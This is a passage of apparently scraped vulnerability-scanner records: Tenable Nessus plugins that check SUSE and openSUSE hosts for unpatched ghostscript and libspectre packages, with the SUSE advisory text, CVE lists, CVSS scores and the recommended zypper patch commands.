(! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ghostscript-9.26-3.9.4\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ghostscript-debuginfo-9.26-3.9.4\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ghostscript-debugsource-9.26-3.9.4\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ghostscript-devel-9.26-3.9.4\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ghostscript-mini-9.26-3.9.3\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ghostscript-mini-debuginfo-9.26-3.9.3\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ghostscript-mini-debugsource-9.26-3.9.3\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ghostscript-mini-devel-9.26-3.9.3\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ghostscript-x11-9.26-3.9.4\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"ghostscript-x11-debuginfo-9.26-3.9.4\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libspectre-debugsource-0.2.8-3.4.3\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libspectre-devel-0.2.8-3.4.3\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libspectre1-0.2.8-3.4.3\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libspectre1-debuginfo-0.2.8-3.4.3\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ghostscript-9.26-3.9.4\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ghostscript-debuginfo-9.26-3.9.4\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ghostscript-debugsource-9.26-3.9.4\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ghostscript-devel-9.26-3.9.4\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ghostscript-mini-9.26-3.9.3\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ghostscript-mini-debuginfo-9.26-3.9.3\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ghostscript-mini-debugsource-9.26-3.9.3\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ghostscript-mini-devel-9.26-3.9.3\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ghostscript-x11-9.26-3.9.4\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"ghostscript-x11-debuginfo-9.26-3.9.4\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libspectre-debugsource-0.2.8-3.4.3\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libspectre-devel-0.2.8-3.4.3\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libspectre1-0.2.8-3.4.3\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libspectre1-debuginfo-0.2.8-3.4.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:35:47", "description": "This update for ghostscript to version 9.26 fixes the following \nissues :\n\nSecurity issues fixed :\n\n - CVE-2018-19475: Fixed bypass of an intended access\n restriction in psi/zdevice2.c (bsc#1117327)\n\n - CVE-2018-19476: Fixed bypass of an intended access\n restriction in psi/zicc.c (bsc#1117313)\n\n - CVE-2018-19477: Fixed bypass of an intended access\n restriction in psi/zfjbig2.c (bsc#1117274)\n\n - CVE-2018-19409: Check if another device is used\n correctly in LockSafetyParams (bsc#1117022)\n\n - CVE-2018-18284: Fixed potential sandbox escape through\n 1Policy operator (bsc#1112229)\n\n - CVE-2018-18073: Fixed leaks through operator in saved\n execution stacks (bsc#1111480)\n\n - CVE-2018-17961: Fixed a -dSAFER sandbox escape by\n bypassing executeonly (bsc#1111479)\n\n - CVE-2018-17183: Fixed a potential code injection by\n specially crafted PostScript files (bsc#1109105)\n\nVersion update to 9.26 (bsc#1117331) :\n\n - Security issues have been the primary focus\n\n - Minor bug fixes and improvements\n\n - For release summary see:\n http://www.ghostscript.com/doc/9.26/News.htm\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-12-17T00:00:00", "title": "openSUSE Security Update : ghostscript (openSUSE-2018-1556)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19477", "CVE-2018-19475", "CVE-2018-19409"], "modified": "2018-12-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ghostscript-mini-debuginfo", "p-cpe:/a:novell:opensuse:ghostscript-x11", "p-cpe:/a:novell:opensuse:ghostscript", "p-cpe:/a:novell:opensuse:ghostscript-mini", "p-cpe:/a:novell:opensuse:libspectre1", "p-cpe:/a:novell:opensuse:libspectre-debugsource", "p-cpe:/a:novell:opensuse:ghostscript-x11-debuginfo", "p-cpe:/a:novell:opensuse:ghostscript-devel", "p-cpe:/a:novell:opensuse:ghostscript-debugsource", "p-cpe:/a:novell:opensuse:libspectre-devel", "p-cpe:/a:novell:opensuse:libspectre1-debuginfo", "p-cpe:/a:novell:opensuse:ghostscript-mini-devel", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:ghostscript-debuginfo", "p-cpe:/a:novell:opensuse:ghostscript-mini-debugsource"], "id": "OPENSUSE-2018-1556.NASL", "href": "https://www.tenable.com/plugins/nessus/119713", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1556.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119713);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2018-17183\",\n \"CVE-2018-17961\",\n \"CVE-2018-18073\",\n \"CVE-2018-18284\",\n \"CVE-2018-19409\",\n \"CVE-2018-19475\",\n \"CVE-2018-19476\",\n \"CVE-2018-19477\"\n );\n script_xref(name:\"IAVB\", value:\"2019-B-0081-S\");\n\n script_name(english:\"openSUSE Security Update : ghostscript (openSUSE-2018-1556)\");\n script_summary(english:\"Check for the openSUSE-2018-1556 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ghostscript to version 9.26 fixes the following \nissues :\n\nSecurity issues fixed :\n\n - CVE-2018-19475: Fixed bypass of an intended access\n restriction in psi/zdevice2.c (bsc#1117327)\n\n - CVE-2018-19476: Fixed bypass of an intended access\n restriction in psi/zicc.c (bsc#1117313)\n\n - CVE-2018-19477: Fixed bypass of an intended access\n restriction in psi/zfjbig2.c (bsc#1117274)\n\n - CVE-2018-19409: Check if another device is used\n correctly in LockSafetyParams (bsc#1117022)\n\n - CVE-2018-18284: Fixed potential sandbox escape through\n 1Policy operator (bsc#1112229)\n\n - CVE-2018-18073: Fixed leaks through operator in saved\n execution stacks (bsc#1111480)\n\n - CVE-2018-17961: Fixed a -dSAFER sandbox escape by\n bypassing executeonly (bsc#1111479)\n\n - CVE-2018-17183: Fixed a potential code injection by\n specially crafted PostScript files (bsc#1109105)\n\nVersion update to 9.26 (bsc#1117331) :\n\n - Security issues have been the primary focus\n\n - Minor bug fixes and improvements\n\n - For release summary see:\n http://www.ghostscript.com/doc/9.26/News.htm\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117331\"\n );\n # http://www.ghostscript.com/doc/9.26/News.htm\n script_set_attribute(attribute:\"see_also\", value:\"https://www.ghostscript.com/doc/9.26/News.htm\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1109105\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1111479\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1111480\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112229\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117022\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117274\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117313\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117327\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1117331\");\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ghostscript packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-mini-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ghostscript-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libspectre1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ghostscript-9.26-14.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ghostscript-debuginfo-9.26-14.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ghostscript-debugsource-9.26-14.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ghostscript-devel-9.26-14.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ghostscript-mini-9.26-14.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ghostscript-mini-debuginfo-9.26-14.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ghostscript-mini-debugsource-9.26-14.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ghostscript-mini-devel-9.26-14.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ghostscript-x11-9.26-14.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"ghostscript-x11-debuginfo-9.26-14.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libspectre-debugsource-0.2.7-17.4.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libspectre-devel-0.2.7-17.4.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libspectre1-0.2.7-17.4.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libspectre1-debuginfo-0.2.7-17.4.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript-mini / ghostscript-mini-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-14T06:16:34", "description": "This update for ghostscript to version 9.26 fixes the following \nissues :\n\nSecurity issues fixed :\n\nCVE-2018-19475: Fixed bypass of an intended access restriction in\npsi/zdevice2.c (bsc#1117327)\n\nCVE-2018-19476: Fixed bypass of an intended access restriction in\npsi/zicc.c (bsc#1117313)\n\nCVE-2018-19477: Fixed bypass of an intended access restriction in\npsi/zfjbig2.c (bsc#1117274)\n\nCVE-2018-19409: Check if another device is used correctly in\nLockSafetyParams (bsc#1117022)\n\nCVE-2018-18284: Fixed potential sandbox escape through 1Policy\noperator (bsc#1112229)\n\nCVE-2018-18073: Fixed leaks through operator in saved execution stacks\n(bsc#1111480)\n\nCVE-2018-17961: Fixed a -dSAFER sandbox escape by bypassing\nexecuteonly (bsc#1111479)\n\nCVE-2018-17183: Fixed a potential code injection by specially crafted\nPostScript files (bsc#1109105)\n\nVersion update to 9.26 (bsc#1117331): Security issues have been the\nprimary focus\n\nMinor bug fixes and improvements\n\nFor release summary see: http://www.ghostscript.com/doc/9.26/News.htm\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-12-13T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : ghostscript (SUSE-SU-2018:4090-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19477", "CVE-2018-19475", "CVE-2018-19409"], "modified": "2018-12-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libspectre1-debuginfo", "p-cpe:/a:novell:suse_linux:ghostscript-debuginfo", "p-cpe:/a:novell:suse_linux:ghostscript-x11-debuginfo", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:ghostscript-x11", "p-cpe:/a:novell:suse_linux:libspectre1", "p-cpe:/a:novell:suse_linux:ghostscript-debugsource", "p-cpe:/a:novell:suse_linux:libspectre-debugsource", "p-cpe:/a:novell:suse_linux:ghostscript"], "id": "SUSE_SU-2018-4090-1.NASL", "href": "https://www.tenable.com/plugins/nessus/119651", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:4090-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119651);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-17183\", \"CVE-2018-17961\", \"CVE-2018-18073\", \"CVE-2018-18284\", \"CVE-2018-19409\", \"CVE-2018-19475\", \"CVE-2018-19476\", \"CVE-2018-19477\");\n script_xref(name:\"IAVB\", value:\"2019-B-0081-S\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : ghostscript (SUSE-SU-2018:4090-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for ghostscript to version 9.26 fixes the following \nissues :\n\nSecurity issues fixed :\n\nCVE-2018-19475: Fixed bypass of an intended access restriction in\npsi/zdevice2.c (bsc#1117327)\n\nCVE-2018-19476: Fixed bypass of an intended access restriction in\npsi/zicc.c (bsc#1117313)\n\nCVE-2018-19477: Fixed bypass of an intended access restriction in\npsi/zfjbig2.c (bsc#1117274)\n\nCVE-2018-19409: Check if another device is used correctly in\nLockSafetyParams (bsc#1117022)\n\nCVE-2018-18284: Fixed potential sandbox escape through 1Policy\noperator (bsc#1112229)\n\nCVE-2018-18073: Fixed leaks through operator in saved execution stacks\n(bsc#1111480)\n\nCVE-2018-17961: Fixed a -dSAFER sandbox escape by bypassing\nexecuteonly (bsc#1111479)\n\nCVE-2018-17183: Fixed a potential code injection by specially crafted\nPostScript files (bsc#1109105)\n\nVersion update to 9.26 (bsc#1117331): Security issues have been the\nprimary focus\n\nMinor bug fixes and improvements\n\nFor release summary see: http://www.ghostscript.com/doc/9.26/News.htm\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.ghostscript.com/doc/9.26/News.htm\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.ghostscript.com/doc/9.26/News.htm\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1109105\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1111479\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1111480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1112229\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1117022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1117274\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1117313\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1117327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1117331\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-17183/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-17961/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-18073/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-18284/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19409/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19475/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19476/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19477/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20184090-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2dfbe88c\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-2916=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP4:zypper in -t\npatch SUSE-SLE-SDK-12-SP4-2018-2916=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-2916=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-2916=1\n\nSUSE Linux Enterprise Server 12-SP4:zypper in -t patch\nSUSE-SLE-SERVER-12-SP4-2018-2916=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-2916=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-2916=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-2916=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-2916=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-2916=1\n\nSUSE Linux Enterprise Desktop 12-SP4:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP4-2018-2916=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-2916=1\n\nSUSE Enterprise Storage 4:zypper in -t patch\nSUSE-Storage-4-2018-2916=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libspectre-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libspectre1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libspectre1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0|1|2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1/2/3/4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ghostscript-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ghostscript-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ghostscript-debugsource-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ghostscript-x11-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ghostscript-x11-debuginfo-9.26-23.16.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libspectre-debugsource-0.2.7-12.4.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", 